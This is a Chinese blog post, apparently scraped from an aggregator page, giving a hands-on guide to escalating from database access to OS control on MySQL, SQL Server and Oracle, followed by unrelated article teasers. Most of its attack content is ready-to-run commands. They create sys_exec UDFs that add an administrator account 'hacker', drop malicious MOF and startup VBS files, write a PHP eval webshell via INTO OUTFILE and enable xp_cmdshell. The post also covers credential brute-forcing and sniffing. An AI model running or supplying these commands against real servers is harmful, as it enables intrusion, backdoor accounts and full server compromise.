news 2026/3/29 15:18:39

数据库提权实战指南

作者头像

张小明

前端开发工程师

1.2k 24
文章封面图
数据库提权实战指南
概述 (Overview)

当获得数据库的高权限访问(如 MySQL 的 root、SQL Server 的 sa、Oracle 的 SYSDBA)后,可以利用数据库自身提供的功能(如用户自定义函数 UDF、存储过程、外部命令执行接口等)或漏洞,在数据库服务器所在的操作系统上执行命令或获取 Shell,从而将数据库权限提升为操作系统权限。

MySQL 提权
  1. 获取 MySQL 账号密码 (Gaining Credentials)

    • Web 应用配置文件: 查找常见的配置文件名 (config.php,database.yml,web.config,conn.inc等) 读取数据库连接字符串。
    • 暴力破解: 如果 MySQL 端口 (默认 3306) 对外开放,使用 Hydra, Medusa, Nmap NSE 脚本等进行在线爆破。
    • 读取物理文件 (需 OS 权限): 读取 MySQL 数据目录下的mysql/user.MYD文件(包含用户信息,密码为 HASH),需离线破解。
    • 嗅探: 在网络中嗅探未加密的 MySQL 连接。
    • 其他漏洞: 利用 Web 应用漏洞(如 SQL 注入、文件读取)获取凭据。
    • 开启远程访问 (需要 root 权限):
      GRANTALLPRIVILEGESON*.*TO'root'@'%'IDENTIFIEDBY'your_password';FLUSHPRIVILEGES;
  2. 利用 UDF (User-Defined Functions) 提权

    • 原理: 创建一个自定义函数(通常用 C/C++ 编写并编译为共享库.so.dll),该函数可以调用系统命令。然后通过 SQL 语句调用这个 UDF 函数。
    • 利用条件:
      • 获取了 MySQL 的高权限账户(如 root),至少有INSERT,DELETE权限和CREATE FUNCTION权限。
      • 知道 MySQL 的插件目录 (plugin_dir) 路径,并且该目录或其上级目录对 MySQL 进程可写(或能通过其他方式将 DLL/SO 文件写入)。
      • (Windows) 可能需要绕过 AppArmor/SELinux 等安全限制。
    • 步骤 (以 Windows DLL 为例):
      1. 确定插件目录:show variables like '%plugin_dir%';
      2. 准备 UDF 库: 获取预编译的udf.dll(如lib_mysqludf_sys提供的sys_exec,sys_eval) 或自行编译。
      3. 上传/写入 DLL:
        • 如果plugin_dir可直接写入,使用SELECT ... INTO DUMPFILE将 DLL 的十六进制内容写入。
        • 如果目录不存在或不可写,尝试利用 NTFS ADS 流创建目录:
          -- 假设插件目录是 C:\mysql\lib\plugin\-- (注意:这种方法可能不可靠或已被修复)select'data'intodumpfile'C:\\mysql\\lib::$INDEX_ALLOCATION';select'data'intodumpfile'C:\\mysql\\lib\\plugin::$INDEX_ALLOCATION';-- 然后再尝试写入 DLLselect0x4D5A90...intodumpfile'C:\\mysql\\lib\\plugin\\udf.dll';
        • 更好的方法是利用其他漏洞(如文件上传)或 OS 权限将 DLL 放入插件目录。
        • 旧版本路径: MySQL < 5.1 可能尝试写入C:\Windows\System32C:\Winnt\System32
      4. 创建函数:
        CREATEFUNCTIONsys_execRETURNSSTRINGSONAME'udf.dll';-- (或对应的 .so 文件)
      5. 执行命令:
        SELECTsys_exec('net user hacker hacker /add');SELECTsys_exec('net localgroup administrators hacker /add');
      6. 清理:
        DROPFUNCTIONsys_exec;-- (可选) 删除 DLL 文件
    • 自动化工具: “MySQL 综合利用工具” 等图形化工具简化了此过程。
  3. 利用 MOF (Managed Object Format) 提权 (Windows)

    • 原理: Windows Management Instrumentation (WMI) 会周期性地编译C:\Windows\System32\wbem\mof\目录下的.mof文件,并以 SYSTEM 权限执行其中定义的 WMI 事件消费者。可以通过构造恶意的.mof文件(定义一个执行命令的消费者)并将其写入该目录来实现提权。
    • 利用条件:
      • 获取了 MySQL 的FILE权限(通常 root 有)。
      • MySQL 配置未启用secure-file-priv或其允许写入wbem/mof目录。
      • 目标是 Windows 系统。
    • 步骤:
      1. 准备 MOF 文件: 编写一个.mof文件,其内容定义一个 WMI 事件过滤器和消费者,消费者执行恶意命令(如添加用户)。网上有现成的模板。
      2. 上传 MOF 文件: 将.mof文件上传到服务器的可写目录(如C:\wmpub\evil.mof)。
      3. 写入 MOF 目录: 使用SELECT ... INTO DUMPFILE将 MOF 文件内容写入目标目录。
        SELECTLOAD_FILE('C:/wmpub/evil.mof')INTODUMPFILE'C:/Windows/System32/wbem/mof/evil.mof';
      4. 等待执行: WMI 会自动编译并执行该 MOF 文件中的指令(通常很快)。
      5. 验证: 检查命令是否已执行(如net user查看是否添加了用户)。
    • 风险: MOF 文件会被周期性执行,可能导致重复添加用户等问题。需要设计好 MOF 文件或及时清理。
  4. 利用SELECT ... INTO OUTFILE/DUMPFILE写文件

    • 原理: 直接利用FILE权限将恶意内容写入特定位置的文件,实现代码执行或配置修改。
    • 写入启动项 (VBS 示例):
      -- 创建临时表存储 VBS 代码行CREATETABLEtemp_vbs(lineTEXT);INSERTINTOtemp_vbsVALUES('Set wshshell = CreateObject("WScript.Shell")');INSERTINTOtemp_vbsVALUES('a = wshshell.run("cmd.exe /c net user hacker hacker /add", 0)');INSERTINTOtemp_vbsVALUES('b = wshshell.run("cmd.exe /c net localgroup Administrators hacker /add", 0)');-- 将表内容导出为 VBS 文件到启动目录SELECTlineFROMtemp_vbsINTOOUTFILE'C:/Documents and Settings/Administrator/Start Menu/Programs/Startup/evil.vbs';-- (路径可能因系统版本和用户名而异)DROPTABLEtemp_vbs;
      • 触发: 需要等待用户下次登录或系统重启。
    • 写入 WebShell: 如果知道 Web 目录路径且有权限,可以直接写入 WebShell。
      SELECT'<?php @eval($_POST["cmd"]);?>'INTOOUTFILE'/var/www/html/shell.php';
SQL Server (MSSQL) 提权
  • 前提: 通常需要sa(System Administrator) 权限或具有CONTROL SERVER权限的用户。
  • 常用方法:
    1. xp_cmdshell:
      • 原理: 内建的扩展存储过程,允许执行操作系统命令。默认可能被禁用。
      • 启用:
        -- 启用高级选项EXECsp_configure'show advanced options',1;RECONFIGURE;-- 启用 xp_cmdshellEXECsp_configure'xp_cmdshell',1;RECONFIGURE;
      • 执行命令:EXEC master..xp_cmdshell 'whoami';
      • 执行权限: 通常以 SQL Server 服务账户的权限运行。如果服务账户是高权限用户(如 LocalSystem, NetworkService 或配置的域用户),即可提权。
    2. 沙盒提权 (SQL Server 2005+): 利用 CLR 集成、OLE Automation Objects (sp_OACreate,sp_OAMethod) 等执行 OS 命令。
    3. 其他存储过程/功能: 如涉及文件系统操作、注册表操作的存储过程。
  • 获取凭据:
    • 查找 Web 应用配置文件 (web.config等)。
    • 暴力破解 (端口 1433)。
    • 嗅探。
  • 自动化工具: SQLTools, Metasploit 相关模块 (admin/mssql/mssql_enum,exploit/windows/mssql/mssql_payload等)。
Oracle 提权
  • 前提: 通常需要SYSDBA,DBA权限或具有特定权限(如CREATE ANY PROCEDURE,CREATE LIBRARY,EXECUTE ON JAVA.LANG.RUNTIME)的用户。
  • 常用方法:
    1. Java Stored Procedures:
      • 原理: Oracle 支持使用 Java 编写存储过程。可以编写一个调用java.lang.Runtime.getRuntime().exec()的 Java 存储过程来执行 OS 命令。
      • 需要权限:CREATE PROCEDURE,EXECUTE ON JAVA.LANG.RUNTIME
    2. External Procedures (extproc):
      • 原理: 调用在操作系统上编译的外部共享库 (.so/.dll) 中的函数。需要配置listener.oratnsnames.ora。可以编写一个执行命令的外部库。
    3. Scheduler Jobs: 创建一个数据库作业 (Job),使其执行包含 OS 命令的 PL/SQL 块或调用上述 Java/External Procedure。
    4. PL/SQL 包: 利用UTL_FILE(文件操作)、DBMS_XMLQUERY(可能触发 XXE 或 SSRF)、DBMS_ADVISOR.CREATE_FILE(写文件) 等包中的过程。
  • 获取凭据: Web 应用配置文件、默认口令 (如scott/tiger,sys/change_on_install)、暴力破解 (端口 1521)。
  • 自动化工具: OracleShell, Metasploit 相关模块。
版权声明: 本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若内容造成侵权/违法违规/事实不符,请联系邮箱:809451989@qq.com进行投诉反馈,一经查实,立即删除!
网站建设 2026/3/27 11:33:46

作品分享:我做的语音情绪可视化小工具

作品分享&#xff1a;我做的语音情绪可视化小工具 1. 这个小工具到底能做什么&#xff1f; 你有没有过这样的体验&#xff1a;听一段客户投诉录音&#xff0c;光靠文字转录根本抓不住对方语气里的火药味&#xff1b;或者剪辑短视频时&#xff0c;想快速定位哪段有笑声、哪段有…

作者头像 李华
网站建设 2026/3/15 23:43:33

系统维护窗口:screen命令创建与管理一文说清

以下是对您提供的博文《系统维护窗口:screen命令创建与管理一文说清》的 深度润色与专业重构版本 。本次优化严格遵循您的全部要求: ✅ 彻底去除AI痕迹,全文以一位有10年+一线Linux运维/嵌入式系统支持经验的技术博主口吻重写 ✅ 摒弃所有模板化标题(如“引言”“总结”…

作者头像 李华
网站建设 2026/3/27 20:39:47

如何快速在本地运行YOLOv9?这个镜像太省心了

如何快速在本地运行YOLOv9&#xff1f;这个镜像太省心了 你是不是也经历过这样的场景&#xff1a;刚下载完YOLOv9论文&#xff0c;热血沸腾想立刻跑通demo&#xff0c;结果卡在第一步——环境装到第三遍还是报错&#xff1b;torch.cuda.is_available() 返回 False&#xff1b;…

作者头像 李华
网站建设 2026/3/27 6:01:16

GPT-OSS开源镜像如何快速上手?保姆级部署教程

GPT-OSS开源镜像如何快速上手&#xff1f;保姆级部署教程 1. 这不是另一个“跑通就行”的教程&#xff0c;而是真正能用起来的实操指南 你可能已经看过不少大模型部署文章&#xff1a;一堆命令、满屏报错、最后卡在某个依赖上动弹不得。今天这篇不一样——它不讲原理推导&…

作者头像 李华
网站建设 2026/3/27 10:24:19

一文说清AUTOSAR网络管理基本工作原理

以下是对您提供的博文《一文说清AUTOSAR网络管理基本工作原理》的 深度润色与专业重构版本 。本次优化严格遵循您的全部要求: ✅ 彻底去除AI痕迹,语言自然、老练、有工程师现场感; ✅ 摒弃“引言/概述/总结”等模板化结构,全文以逻辑流驱动,层层递进; ✅ 所有技术点…

作者头像 李华
网站建设 2026/3/27 6:06:14

手把手教你排查NX12.0捕获标准C++异常时的运行时错误

以下是对您提供的技术博文进行 深度润色与工程化重构后的终稿 。全文已彻底去除AI生成痕迹,语言风格贴近资深NX二次开发工程师的实战分享口吻——逻辑严密、节奏紧凑、术语精准、案例真实,并强化了“可操作性”与“可复现性”。结构上打破传统模块化标题束缚,以问题驱动为…

作者头像 李华